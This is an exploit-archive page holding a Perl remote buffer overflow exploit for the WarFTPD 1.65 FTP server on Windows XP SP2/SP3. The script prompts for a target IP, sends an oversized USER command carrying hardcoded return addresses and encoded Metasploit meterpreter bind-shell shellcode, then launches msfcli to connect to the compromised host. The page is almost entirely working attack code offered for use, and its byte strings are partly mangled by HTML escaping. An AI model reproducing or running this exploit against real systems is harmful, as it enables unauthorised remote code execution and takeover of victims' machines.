Home / os / win7

WarFTPD 1.65 (USER) Remote Buffer Overflow Exploit

Posted on 27 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WarFTPD 1.65 (USER) Remote Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================
WarFTPD 1.65 (USER) Remote Buffer Overflow Exploit
==================================================


# Exploit Title: Remote Buffer Overflow Exploit WarFTPD 1.65 (USER) - Windows XP Pro SP2 / SP3 [English]
# Date: 26/6/2010
# Author: mr.pr0n
# Software Link:
# Version: WarFTPD 1.65
# Tested on: Windows XP Pro SP2 / SP3 [English]
# CVE :
# Code :
 
#!/usr/bin/perl

use IO::Socket;

print &quot;
#----[ mr.pr0n ]--------------------------------------------------------#
&quot;;
print &quot;#    Target App: WarFTPD 1.65  (USER).                    #
&quot;;
print &quot;#    Attack    : Remote Buffer Overflow Exploit.             #
&quot;;
print &quot;#    Target OS : Windows XP Pro [Service Pack 2 / Service Pack 3].    #
&quot;;
print &quot;#----------------------------------------[http://www.p0wnbox.com]-------#
&quot;;
print &quot;
Enter your target's IP (e.g.: 192.168.0.123)
&quot;;
print &quot;&gt; &quot;;
$target=&lt;STDIN&gt;;
chomp($target);
print &quot;Enter your target's version of Windows XP Service Pack [2/3] (e.g.: 2)
&quot;;
print &quot;&gt; &quot;;
$sp=&lt;STDIN&gt;;
chomp($sp);

if ($sp == 2) {
          # Lets define the RET, if our target is Windows SP2.
          $RET= &quot;x72x93xabx71&quot;; # ws2_32.dll push ESP - ret
          }
          elsif ($sp == 3)
            {
                        # Lets define the RET, if our target is Windows SP3.
            $RET= &quot;x53x2bxabx71&quot;; # ws2_32.dll push ESP - ret
            }
else {
     print &quot;[-] Wrong version of Windows XP Service Pack!
&quot;;
     exit(1);
     }

# We need 485 bytes to override the EIP.
$junkBytes     = &quot;x41&quot; x 485; # Send 485 &quot;A&quot;.

# We need 569 bytes to override the Seh Handler.
$junkBytes_2     = &quot;x41&quot; x 84; # Send(485 + 84 =)569 &quot;A&quot;.


#-----------------------------------------------------------------------------------------------------------------------#
#[pr0n@megatron ~]$ msfpayload windows/meterpreter/bind_tcp LPORT=4444  R | msfencode -b 'x00x0ax0dx40' -t c    #
#[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)                                 #
#-----------------------------------------------------------------------------------------------------------------------#

#-----------------------------------------------#
# windows/meterpreter/bind_tcp - 326 bytes     #
# http://www.metasploit.com             #
# Encoder: x86/shikata_ga_nai             #
# Bad Characters: x00, x0a, x0d, x40     #
# LPORT=4444                     #
#-----------------------------------------------#

$shellcode =
&quot;xdbxd3x33xc9xd9x74x24xf4xb1x4bxbaxabx11xadx09&quot;.
&quot;x5bx83xebxfcx31x53x16x03x53x16xe2x5exedx45x80&quot;.
&quot;xa0x0ex96xf3x29xebxa7x21x4dx7fx95xf5x06x2dx16&quot;.
&quot;x7dx4axc6xadxf3x42xe9x06xb9xb4xc4x97x0fx78x8a&quot;.
&quot;x54x11x04xd1x88xf1x35x1axddxf0x72x47x2exa0x2b&quot;.
&quot;x03x9dx55x58x51x1ex57x8exddx1ex2fxabx22xeax85&quot;.
&quot;xb2x72x43x91xfcx6axefxfdxdcx8bx3cx1ex20xc5x49&quot;.
&quot;xd5xd3xd4x9bx27x1cxe7xe3xe4x23xc7xe9xf5x64xe0&quot;.
&quot;x11x80x9ex12xafx93x65x68x6bx11x7bxcaxf8x81x5f&quot;.
&quot;xeax2dx57x14xe0x9ax13x72xe5x1dxf7x09x11x95xf6&quot;.
&quot;xddx93xedxdcxf9xf8xb6x7dx58xa5x19x81xbax01xc5&quot;.
&quot;x27xb1xa0x12x51x98xacxd7x6cx22x2dx70xe6x51x1f&quot;.
&quot;xdfx5cxfdx13xa8x7axfax54x83x3bx94xaax2cx3cxbd&quot;.
&quot;x68x78x6cxd5x59x01xe7x25x65xd4xa8x75xc9x87x08&quot;.
&quot;x25xa9x77xe1x2fx26xa7x11x50xecxc0xe3x75x5cx87&quot;.
&quot;x01x89x72x0bx8fx6fx1exa3xd9x38xb7x01x3exf1x20&quot;.
&quot;x79x14xaexf9xedx20xb9x3ex11xb1xecx6cxbex19x66&quot;.
&quot;xe7xacx9dx97xf8xf8xb5xc0x6fx76x54xa3x0ex87x7d&quot;.
&quot;x51xd1x1dx7axf3x86x89x80x22xe0x15x7ax01x7ax9f&quot;.
&quot;xeexe9x15xe0xfexe9xe5xb6x94xe9x8dx6excdxbaxa8&quot;.
&quot;x70xd8xafx60xe5xe3x99xd5xaex8bx27x03x98x13xd8&quot;.
&quot;x66x18x6fx0fx4fx9ex99x3axa3x62x6f&quot;;

if ($socket = IO::Socket::INET-&gt;new
     (PeerAddr =&gt; $target,
         # Default FTP Port!
     PeerPort =&gt; &quot;21&quot;,
     Proto =&gt; &quot;TCP&quot;))
        {
        print &quot;
[*] Sending Buffer at: $target ...
&quot;;
                # This is our Buffer, we are sending a long username with the USER ftp command.
        $exploit  = &quot;USER &quot;.$junkBytes.$RET.$junkBytes_2.$shellcode;
        print $socket $exploit.&quot;
&quot;;
                # Hey, wait only for a sec!
        sleep(1);
        close($socket);
        print &quot;[*] Exploitation Done!
&quot;;

                # Connect to the victim with metasploit.
                $command = &quot;msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=$target LPORT=4444 E
&quot;;
                system ($command);
        }

else
    {
    print &quot;[-] Connection to $target failed!
&quot;;
    }


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :